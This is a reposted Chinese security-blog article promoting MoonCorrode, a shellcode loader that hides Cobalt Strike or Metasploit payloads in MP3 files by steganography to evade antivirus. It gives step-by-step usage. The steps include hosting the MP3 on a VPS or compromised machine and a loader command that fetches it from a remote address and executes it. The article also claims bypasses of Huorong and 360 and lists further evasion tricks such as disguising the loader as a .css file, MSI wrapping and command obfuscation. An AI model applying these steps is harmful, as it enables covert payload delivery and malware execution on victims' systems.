MoonCorrode月蚀 / ShellCodeToLSBMP3 / ShellCode读写分离隐写免杀加载器

admin 2025年5月7日10:20:01评论2 views字数 1072阅读3分34秒阅读模式

 

工具介绍

MoonCorrode月蚀 / ShellCodeToLSBMP3, MoonCorrode是一款专为红队攻防演练设计的高效、模块化ShellCode读写分离加密以及加载器,旨在通过动态技术绕过主流杀毒软件检测,实现隐蔽化payload注入与执行。项目基于Python3.11开发,助力红队在复杂防御环境中完成权限维持、横向渗透等战术目标。

MoonCorrode月蚀 / ShellCodeToLSBMP3 / ShellCode读写分离隐写免杀加载器

工具使用

使用Cobalt Strike或者Metasploit生成Python格式的Payload文件,默认强制性文件为payload.py

MoonCorrode月蚀 / ShellCodeToLSBMP3 / ShellCode读写分离隐写免杀加载器

payload.py放置在ShellCodeEncrypt.exe相同目录下,同级目录下还有自带的The Tsukimori Song.mp3,当然了使用者也可以自己准备一个mp3文件,建议使用自带,如果自己准备mp3文件的话,建议音频大小超过4MB,否则会出现一些问题。

运行ShellCodeEncrypt.exe,可以指定参数file指定自定义的mp3音频文件,默认使用自带mp3音频文件

会在同级目录生成一个新的mp3,mp3隐写数据:AES加密的IV,KEY以及加密后的ShellCode,当然了这个IV和KEY攻击者无需记录。

MoonCorrode月蚀 / ShellCodeToLSBMP3 / ShellCode读写分离隐写免杀加载器

可以把生成新的mp3文件存储在VPS,肉鸡,或者任何其他任何HTTP请求网络资源上,需要记住这个自定义地址。

肉鸡演示例如:http://xxx.xxx.xxx.xxx:8084/1745976130.mp3

ShellCodeLoader.exe需要上传至服务器端,执行命令ShellCodeLoader.exe --cnm=http://xxx.xxx.xxx.xxx:8084/1745976130.mp3

heavy_check_mark:杀软绕过上线测试

火绒(病毒样本库:2025.04.29)

MoonCorrode月蚀 / ShellCodeToLSBMP3 / ShellCode读写分离隐写免杀加载器

360安全卫士(病毒样本库:2025.04.30,多引擎)

MoonCorrode月蚀 / ShellCodeToLSBMP3 / ShellCode读写分离隐写免杀加载器

red_circle:其他绕过提示

1.ShellCodeLoader.exe可以改成xxxx.css,命令行使用cmd.exe /c xxxx.css --cnm=xxx

2.封装msi远程调用

3.使用DOSfuscation进行命令行全局混淆

4.ShellCodeLoader源代码公开,闲的没事做的人可以改改,有的憨批厂商喜欢用Hash做特征,哄堂大孝了家人们

工具获取

https://github.com/Tas9er/MoonCorrode

原文始发于微信公众号(夜组安全):MoonCorrode月蚀 / ShellCodeToLSBMP3 / ShellCode读写分离隐写免杀加载器

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月7日10:20:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MoonCorrode月蚀 / ShellCodeToLSBMP3 / ShellCode读写分离隐写免杀加载器https://cn-sec.com/archives/4036340.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息